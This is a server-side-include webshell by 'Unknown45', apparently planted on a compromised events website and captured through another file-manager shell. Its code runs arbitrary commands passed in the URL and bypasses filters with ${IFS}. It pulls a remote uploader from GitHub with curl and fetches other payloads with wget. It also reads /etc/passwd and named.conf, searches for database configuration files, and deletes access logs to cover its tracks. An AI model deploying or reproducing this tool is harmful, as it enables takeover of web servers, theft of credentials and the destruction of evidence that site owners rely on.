Mini Shell

Direktori : /home/athamevents/public_html/admin/work_pic/
Upload File :
Current File : /home/athamevents/public_html/admin/work_pic/ssi.shtml

<!-- Author : Unknown45 -->
<!-- hargai author dengan cara menggunakan script ini tanpa recode script nya !!! -->

<!-- 
Recoded? only changed and delete copyright? Don't be a bastard dude!
 ~ Kata Bang zerobyte.id
  -->

<!--#config errmsg="Error / Webnya Ga Support SSI Command"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="whoami" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<html>
<head>
<title>SSI Webshell</title>
<meta name="theme-color" content="#000">
<meta name="Author" content="Unknown45">
<meta name="description" content="Security ? that just an illusion - ">
<meta property="og:description" content="Security ? that just an illusion - ">
</head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/pace-js@latest/pace.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@latest/pace-theme-default.min.css">
<script language="javascript">

function unknown45()
{
	var uri = document.getElementById('command').value;
	var rep = uri.replace(/[ ]/g,'${IFS}');
	var res = encodeURI(uri);
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"&&test";
}

function refresh() {
	document.location.href="<!--#echo var=DOCUMENT_NAME -->";
}

function checkfile() {
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"ls${IFS}-la";
}

	function readpass() {
		var selectedobj=document.getElementById('readpass');

		if(selectedobj.className=='hide'){  //check if classname is hide 
			selectedobj.style.display = "block";
			selectedobj.readOnly=true;
			selectedobj.className ='show';
		}else{
			selectedobj.style.display = "none";
			selectedobj.className ='hide';
 }
}

	function readnamed() {
		var selectedobj=document.getElementById('readnamed');

		if(selectedobj.className=='hide'){  //check if classname is hide 
			selectedobj.style.display = "block";
			selectedobj.readOnly=true;
			selectedobj.className ='show';
		}else{
			selectedobj.style.display = "none";
			selectedobj.className ='hide';
 }
}

	function movefiles() {
		var selectedobj=document.getElementById('movefiles');

		if(selectedobj.className=='hide'){  //check if classname is hide 
			selectedobj.style.display = "block";
			selectedobj.readOnly=true;
			selectedobj.className ='show';
		}else{
			selectedobj.style.display = "none";
			selectedobj.className ='hide';
 }
}

	function upfiles() {
		var selectedobj=document.getElementById('upfiles');

		if(selectedobj.className=='hide'){  //check if classname is hide 
			selectedobj.style.display = "block";
			selectedobj.readOnly=true;
			selectedobj.className ='show';
		}else{
			selectedobj.style.display = "none";
			selectedobj.className ='hide';
 }
}

	function renamefiles() {
		var selectedobj=document.getElementById('renamefiles');

		if(selectedobj.className=='hide'){  //check if classname is hide 
			selectedobj.style.display = "block";
			selectedobj.readOnly=true;
			selectedobj.className ='show';
		}else{
			selectedobj.style.display = "none";
			selectedobj.className ='hide';
 }
}

	function deletefiles() {
		var selectedobj=document.getElementById('deletefiles');

		if(selectedobj.className=='hide'){  //check if classname is hide 
			selectedobj.style.display = "block";
			selectedobj.readOnly=true;
			selectedobj.className ='show';
		}else{
			selectedobj.style.display = "none";
			selectedobj.className ='hide';
 }
}

	function findfiles() {
		var selectedobj=document.getElementById('findfiles');

		if(selectedobj.className=='hide'){  //check if classname is hide 
			selectedobj.style.display = "block";
			selectedobj.readOnly=true;
			selectedobj.className ='show';
		}else{
			selectedobj.style.display = "none";
			selectedobj.className ='hide';
 }
}

function addupload()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"curl${IFS}-Ls${IFS}raw.githubusercontent.com/whoami-45/php-code/main/uploader.php${IFS}|${IFS}tee${IFS}-a${IFS}uploader.php";
}

function checkroot() {
	var uri = "ls -la ";
	var rep = uri.replace(/[ ]/g,'${IFS}');
	var res = encodeURI(uri);
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_ROOT -->";
}

function deletelog() {
	var yakin = confirm("yakin hapus access logs nya ?");
	if (yakin == true) {
	var uri = "rm -rf ";
	var rep = uri.replace(/[ ]/g,'${IFS}');
	var res = encodeURI(uri);
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_ROOT -->/../logs/ *";
} else {
	return true;
}
}

function delsel() {
	var uri = "rm -rf ";
	var rep = uri.replace(/[ ]/g,'${IFS}');
	var res = encodeURI(uri);
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep)+"<!--#echo var=DOCUMENT_NAME --> |${IFS}clear${IFS}&&${IFS}echo${IFS}Done";
}

function movesatu()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../"+document.getElementById('movefile').value;
}

function movedua()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../"+document.getElementById('movefile').value;
}

function movetiga()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../../"+document.getElementById('movefile').value;
}

function moveroot()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('movefile').value;
}

function upfile()
{
	var url = document.getElementById('linknya').value;
	var https = url.split("https://").join("");
	var http = https.split("http://").join("");
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"wget${IFS}"+encodeURI(http)+"${IFS}"+"--no-check-certificate${IFS}&&${IFS}ls${IFS}-la";
}

function renamefile()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"mv${IFS}"+document.getElementById('renameawal').value+"${IFS}"+document.getElementById('renameakhir').value+"${IFS}&&${IFS}ls${IFS}-la";
}

function deletefile()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la";
}

function deleteinroot()
{
	var yakin = confirm("yakin hapus file ini di directory root ?");
	if (yakin == true) {
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->/"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}<!--#echo var=DOCUMENT_ROOT -->";
} else {
	return true;
}
}

function deletefiledua()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletedir').value+"/"+document.getElementById('deletefiledua').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}"+document.getElementById('deletedir').value;
}

function findfile()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;
}

function findinroot()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;
}

function findfiledua()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+document.getElementById('finddir').value+"${IFS}|${IFS}grep${IFS}"+document.getElementById('findfiledua').value;
}

function finddb()
{
	document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"du${IFS}-ah${IFS}"+"<!--#echo var=DOCUMENT_ROOT -->${IFS}"+"|${IFS}grep${IFS}-e${IFS}config.php${IFS}-e${IFS}database.php${IFS}-e${IFS}config.inc.php${IFS}-e${IFS}koneksi.php";
}
</script>
<style type="text/css">
	.input {
		background: transparent;
		border-color: #ffffff;
		border-width: thin;
		border: groove;
		cursor: pointer;
	}

	button {
		cursor: pointer;
	}
</style>

</head>
<body onload="checkaja()">
<font face=courier size=2><i><center>SSI Webshell by Unknown45<hr><font face="courier" size=2>
<font size=2>Command : <input type=text size=60 id=command class="text" name="address1" style="max-width: 100%; max-height: 100%;"> <button class="input" id="gas" onclick="unknown45();">Execute</button></center>
	<br><br>Host : <b><!--#echo var=HTTP_HOST --></b>
	<br>Server Address : <b><!--#echo var=SERVER_ADDR --></b>
	<br>User : <b><!--#exec cmd="id" --></b>
	<br>System : <b><!--#exec cmd="{uname,-nrv}" --></b>
	<br><br>Current Path : <b><!--#echo var=DOCUMENT_ROOT --><!--#echo var=SCRIPT_NAME --></b><br></i>
	Python : <b><!--#exec cmd="{test,-e,/usr/bin/python}&&{echo,ON}||{echo,OFF}" --></b> |  MySql : <b><!--#exec cmd="{test,-e,/usr/bin/mysql}&&{echo,ON}||{echo,OFF}" --></b> |  Perl : <b><!--#exec cmd="{test,-e,/usr/bin/perl}&&{echo,ON}||{echo,OFF}" --></b> | Ruby : <b><!--#exec cmd="{test,-e,/usr/bin/ruby}&&{echo,ON}||{echo,OFF}" --></b> | Wget : <b><!--#exec cmd="{test,-e,/usr/bin/wget}&&{echo,ON}||{echo,OFF}" --></b><hr>
	<center><button onclick="refresh()" style="float: left;">Refresh</button> <button onclick="checkfile()">list file</button> <button onclick="renamefiles()">rename file</button> <button onclick="movefiles()">move file</button> <button onclick="deletefiles()">delete file</button> <button onclick="findfiles()">find file</button> <button onclick="upfiles()">upload file</button> <button onclick="delsel()" style="float: right;">Remove Shell</button><br><br>
		<button onclick="readpass();">read /etc/passwd</button> <button onclick="readnamed();">read /etc/named.conf</button> <button onclick="addupload()">add uploader.php</button> <button onclick="checkroot()">check root directory</button> <button onclick="deletelog()">delete access logs</button></center>
<hr></i>
Executed Command : </font><b><font face="courier" id="cmd"><!--#echo var=shl --></font></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15 style="width: 100%">
<!--#exec cmd=$shl -->

Zerion Mini Shell 1.0